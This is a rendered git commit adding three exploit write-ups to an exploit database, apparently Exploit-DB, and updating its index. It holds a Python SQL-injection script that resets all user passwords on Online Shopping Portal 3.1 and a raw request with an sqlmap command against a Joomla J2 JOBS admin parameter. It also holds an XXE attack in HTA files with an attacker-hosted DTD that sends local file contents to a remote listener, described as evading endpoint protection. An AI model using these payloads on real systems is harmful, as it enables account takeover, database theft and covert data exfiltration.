||||
CVE: CVE-2020-14945
|
||||
|
||||
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14945
|
54
exploits/php/webapps/48647.txt
Normal file
54
exploits/php/webapps/48647.txt
Normal file
|
@ -0,0 +1,54 @@
|
|||
# Exploit Title: Online Shopping Portal 3.1 - 'email' SQL Injection
|
||||
# Date: 2020-07-06
|
||||
# Exploit Author: gh1mau
|
||||
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
|
||||
# Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/
|
||||
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7393
|
||||
# Version: V3.1
|
||||
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)
|
||||
|
||||
Info:
|
||||
-----
|
||||
[+] Attacker can change all user's password from the forgot-password.php page and login to their account.
|
||||
|
||||
Vulnerable File:
|
||||
----------------
|
||||
/forgot-password.php
|
||||
|
||||
Vulnerable Code:
|
||||
-----------------
|
||||
line 8: $email=$_POST['email'];
|
||||
|
||||
Vulnerable Issue:
|
||||
-----------------
|
||||
$email=$_POST['email']; has no sanitization
|
||||
|
||||
|
||||
|
||||
POC:
|
||||
----
|
||||
|
||||
import requests
|
||||
|
||||
url = "http://localhost:80/shopping/forgot-password.php"
|
||||
|
||||
password = "gh1mau"
|
||||
payload = "email=saya%40saya.com' or '1'='1'#&contact=1234&password=" + password + "&confirmpassword=" + password + "&change="
|
||||
headers = {
|
||||
"Origin": "http://localhost",
|
||||
"Cookie": "PHPSESSID=pq2dc9oja60slrifcfjuq7vhf0",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
|
||||
"Connection": "close",
|
||||
"Referer": "http://localhost/shopping/forgot-password.php",
|
||||
"Host": "localhost",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Accept-Language": "en-US,en;q=0.5",
|
||||
"Content-Length": "96",
|
||||
"Content-Type": "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
response = requests.request("POST", url, data=payload, headers=headers)
|
||||
|
||||
print("[+] Try login with password : " + password)
|
31
exploits/php/webapps/48648.txt
Normal file
31
exploits/php/webapps/48648.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
|
||||
# Date: 2020-06-17
|
||||
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
|
||||
# Vendor Homepage: https://joomsky.com/
|
||||
# Software Link: https://joomsky.com/products/js-jobs-pro.html
|
||||
# Change Log (Update) : https://joomsky.com/products/js-jobs.html
|
||||
# Version: 1.3.0
|
||||
# Tested on: Kali Linux - Apache2
|
||||
|
||||
Vulnerable param: sortby
|
||||
-------------------------------------------------------------------------
|
||||
POST /joomla/administrator/index.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/joomla/administrator/index.php
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 233
|
||||
Connection: close
|
||||
Cookie: COOKIES
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
|
||||
|
||||
|
||||
-------------------------------------------------------------------------
|
||||
sqlmap poc:
|
||||
|
||||
sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby
|
130
exploits/xml/remote/48650.txt
Normal file
130
exploits/xml/remote/48650.txt
Normal file
|
@ -0,0 +1,130 @@
|
|||
# Exploit Title: Microsoft Windows mshta.exe 2019 - XML External Entity Injection
|
||||
# Date: 2020-07-07
|
||||
# Exploit Author: hyp3rlinx
|
||||
# Vendor homepage: https://www.microsofft.com/
|
||||
# CVE: N/A
|
||||
|
||||
|
||||
[+] Credits: John Page (aka hyp3rlinx)
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MSHTA-HTA-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
|
||||
[+] twitter.com/hyp3rlinx
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
[Vendor]
|
||||
www.microsoft.com
|
||||
|
||||
|
||||
[Product]
|
||||
Windows MSHTA.EXE .HTA File
|
||||
|
||||
|
||||
An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more
|
||||
scripting languages supported by Internet Explorer, such as VBScript or JScript. The HTML is used to generate the
|
||||
user interface, and the scripting language is used for the program logic. An HTA executes without the constraints
|
||||
of the internet browser security model; in fact, it executes as a "fully trusted" application.
|
||||
|
||||
|
||||
[Vulnerability Type]
|
||||
XML External Entity Injection
|
||||
|
||||
|
||||
[Impact]
|
||||
Information disclosure, Recon
|
||||
|
||||
|
||||
[CVE Reference]
|
||||
N/A
|
||||
|
||||
|
||||
[Security Issue]
|
||||
Windows mshta.exe allows processing of XML External Entitys, this can result in local data-theft and or program reconnaissance upon opening
|
||||
specially crafted HTA files. From an attacker perspective, since we are not dependent on scripting languages like Javascript, VBScript or
|
||||
WScript.Shell, we may have better chances at subverting endpoint protection systems as we are only using XML markup.
|
||||
|
||||
HTA exploits found online typically show code execution, with reliance on ActiveX Objects and scripting engines and hence are more
|
||||
easily detected by security products. Many of these exploits also use payload obfuscation techniques for stealth. However, I found nothing
|
||||
publicly documented that leverages XML injection targeting the mshta.exe HTA file-type.
|
||||
|
||||
Yea I know, no code execution. However, we get stealthy data theft with recon capabilities. Armed with this info, we can more accurately
|
||||
target potential software vulnerabilities at a later date from info gathering a systems program installations. Usually, this type of recon
|
||||
is seen in first-stage malware infections using the Windows CreateToolhelp32Snapshot API.
|
||||
|
||||
Therefore, since theres no documented HTA exploits using XXE attacks for this file type, I release the advisory.
|
||||
Successfully tested on Windows 10 and Windows Servers 2016, 2019.
|
||||
|
||||
|
||||
[Exploit/POC]
|
||||
Multi program recon and check if running in a Virtual Machine all in a single HTA file, change IP accordingly.
|
||||
|
||||
1) "Doit.hta"
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<!-- VMware check -->
|
||||
<xml>
|
||||
<!DOCTYPE xxe4u [
|
||||
<!ENTITY % file SYSTEM "C:\ProgramData\VMware\VMware Tools\manifest.txt">
|
||||
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/datatears.dtd">
|
||||
%dtd;]>
|
||||
<pwn>&send;</pwn>
|
||||
</xml>
|
||||
|
||||
<!-- Notepad++ install check -->
|
||||
<xml>
|
||||
<!DOCTYPE xxe4u [
|
||||
<!ENTITY % file SYSTEM "C:\Program Files (x86)\Notepad++\change.log">
|
||||
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/datatears.dtd">
|
||||
%dtd;]>
|
||||
<pwn>&send;</pwn>
|
||||
</xml>
|
||||
|
||||
<!-- McAfee AV install check -->
|
||||
<xml>
|
||||
<!DOCTYPE xxe4u [
|
||||
<!ENTITY % file SYSTEM "C:\ProgramData\McAfee\MCLOGS\VSCoreVersionInfo.txt">
|
||||
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/datatears.dtd">
|
||||
%dtd;]>
|
||||
<pwn>&send;</pwn>
|
||||
</xml>
|
||||
<HTA:APPLICATION WINDOWSTATE="minimize" />
|
||||
|
||||
|
||||
2) The "datatears.dtd" DTD file hosted on attackers server.
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
|
||||
%all;
|
||||
|
||||
|
||||
3) Local Python v3 web-server listening on port 8000 to receive victims info.
|
||||
|
||||
python -m http.server
|
||||
|
||||
|
||||
[POC Video URL]
|
||||
https://www.youtube.com/watch?v=XaTrBEu4Ghw
|
||||
|
||||
|
||||
[Network Access]
|
||||
Remote
|
||||
|
||||
|
||||
[Severity]
|
||||
High
|
||||
|
||||
|
||||
[Disclosure Timeline]
|
||||
MSHTA .HTA files are classified untrusted, many threats already well known.
|
||||
July 4, 2020 : Public Disclosure
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
|
@ -11119,6 +11119,7 @@ id,file,description,date,author,type,platform,port
|
|||
48624,exploits/windows/local/48624.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-06-26,"Ethan Seow",local,windows,
|
||||
48625,exploits/windows/local/48625.txt,"KiteService 1.2020.618.0 - Unquoted Service Path",2020-06-26,"Marcos Antonio León",local,windows,
|
||||
48628,exploits/windows/local/48628.py,"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)",2020-07-01,"Paras Bhatia",local,windows,
|
||||
48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18207,6 +18208,7 @@ id,file,description,date,author,type,platform,port
|
|||
48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,
|
||||
48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,
|
||||
48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,
|
||||
48650,exploits/xml/remote/48650.txt,"Microsoft Windows mshta.exe 2019 - XML External Entity Injection",2020-07-07,hyp3rlinx,remote,xml,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -42879,6 +42881,7 @@ id,file,description,date,author,type,platform,port
|
|||
48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
|
||||
48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
|
||||
48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
|
||||
48642,exploits/linux/webapps/48642.sh,"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution",2020-07-06,"Critical Start",webapps,linux,
|
||||
48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
|
||||
48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
|
||||
48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
|
||||
|
@ -42895,3 +42898,8 @@ id,file,description,date,author,type,platform,port
|
|||
48636,exploits/php/webapps/48636.txt,"RiteCMS 2.2.1 - Authenticated Remote Code Execution",2020-07-06,"Enes Özeser",webapps,php,
|
||||
48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,
|
||||
48640,exploits/php/webapps/48640.txt,"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution",2020-07-06,"Basim Alabdullah",webapps,php,
|
||||
48643,exploits/linux/webapps/48643.txt,"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)",2020-07-05,"Budi Khoirudin",webapps,linux,
|
||||
48646,exploits/hardware/webapps/48646.py,"Sickbeard 0.1 - Remote Command Injection",2020-07-07,bdrake,webapps,hardware,
|
||||
48647,exploits/php/webapps/48647.txt,"Online Shopping Portal 3.1 - 'email' SQL Injection",2020-07-07,gh1mau,webapps,php,
|
||||
48648,exploits/php/webapps/48648.txt,"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection",2020-07-07,"Mehmet Kelepçe",webapps,php,
|
||||
48649,exploits/multiple/webapps/48649.txt,"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation",2020-07-07,"William Summerhill",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue